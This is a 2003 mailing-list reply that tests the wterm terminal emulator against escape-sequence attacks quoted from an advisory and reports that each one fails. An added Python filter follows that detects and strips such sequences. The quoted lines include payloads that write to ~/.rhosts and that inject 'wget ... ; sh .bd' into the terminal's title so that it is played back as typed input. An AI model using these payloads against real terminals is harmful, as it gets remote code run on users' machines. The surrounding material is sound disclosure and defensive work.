Re: Terminal Emulator Security Issues

From: Juraj Ziegler (e@hq.sk)
Date: 02/25/03

    Date: Tue, 25 Feb 2003 01:23:09 +0100
    From: Juraj Ziegler <e@hq.sk>
    To: H D Moore <termulation@digitaloffense.net>
    
    
    

    Wterm was not mentioned throughout the article, so I decided to test it
    quickly.

    On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:
    > $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"

    Does not work. Code 33 is not implemented, according to the
    documentation, code 50 is used to change font [specifying movement in
    the terminal's font list].

    > $ echo -e "\e]2;This is the new window title\a"

    Works.

    > $ echo -e "\e[21t"

    echo -e "\e]2;whoo\a"
    echo -e "\e[21t"

    Changes window title to 'whoo', but nothing is pasted -> does not work.

    > $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

    It can be deduced that this does not work either, and a quick test
    proved it.

    > $ echo -e "\eP0;0|0A/17\x9c"

    Safe from this harm, over here.

    > $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

    Besides a weird output from echo itself [as not all characters were
    handled by the terminal], nothing.

    The output is: :]itd

    As to wterm's origin, it seems to be based on rxvt
    <quote site="http://largo.windowmaker.org/files.php#wterm">
    wterm started as a beta test of some additions Alfredo hoped to get
    contributed to the official rxvt source tree.
    </quote>

    Version tested: 6.2.9 - latest (even though released in 8/2001)

    [e]

    -- 
    _______________________________________________________________________________
    >e@hq.sk<                   /(bb|[^b]{2})/                 >http://hq.sk/~euro<
            "always know what you say, but do not always say what you know"
    
    


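Added example, not part of the original message and not code from wterm or rxvt: a Python filter that flags and strips the kinds of sequences tested above (OSC title set, the CSI 21t title report, DCS strings) from untrusted bytes before they reach a terminal. The function names, labels and sample bytes are constructed for illustration, and only ESC-introduced (7-bit) sequences are handled.

```python
import re

# ESC-introduced control strings and sequences of the kinds tested above.
# String terminators accepted: BEL, ESC \ (7-bit ST) and 0x9c (8-bit ST).
_SEQ = re.compile(
    rb"\x1b\](?P<osc>\d*)[^\x07\x1b\x9c]*(?:\x07|\x1b\\|\x9c)?"  # OSC string
    rb"|\x1bP(?P<dcs>[^\x1b\x9c]*)(?:\x1b\\|\x9c)?"              # DCS string
    rb"|\x1b\[(?P<csi>[0-?]*)[ -/]*(?P<final>[@-~])"             # CSI sequence
    rb"|\x1b[ -/]*[0-~]"                                         # other escape, e.g. ESC c
    rb"|\x1b"                                                    # stray ESC byte
)

def scan(data: bytes):
    """Return (label, raw_bytes) for every control sequence found in data."""
    hits = []
    for m in _SEQ.finditer(data):
        if m.group("osc") is not None:
            code = m.group("osc").decode() or "?"
            # OSC 0 and OSC 2 both set the window title.
            label = "osc-title-set" if code in ("0", "2") else "osc-" + code
        elif m.group("dcs") is not None:
            label = "dcs-string"
        elif m.group("final") is not None:
            first = m.group("csi").split(b";")[0]
            # CSI 21 t asks the terminal to report its title back as input.
            is_report = m.group("final") == b"t" and first == b"21"
            label = "csi-title-report" if is_report else "csi"
        else:
            label = "esc-other"
        hits.append((label, m.group(0)))
    return hits

def sanitize(data: bytes) -> bytes:
    """Drop every matched sequence so only the remaining text is displayed."""
    return _SEQ.sub(b"", data)

# Constructed sample: harmless title text, the title report and a DCS string.
SAMPLE = b"build ok\n\x1b]2;whoo\x07\x1b[21t\nnext line \x1bP0;0|0A/17\x9cdone\n"

if __name__ == "__main__":
    for label, raw in scan(SAMPLE):
        print(label, repr(raw))
    print(repr(sanitize(SAMPLE)))
```

An unterminated OSC or DCS string is consumed up to the next ESC or terminator byte, so the filter errs toward removing text rather than passing a partial sequence through.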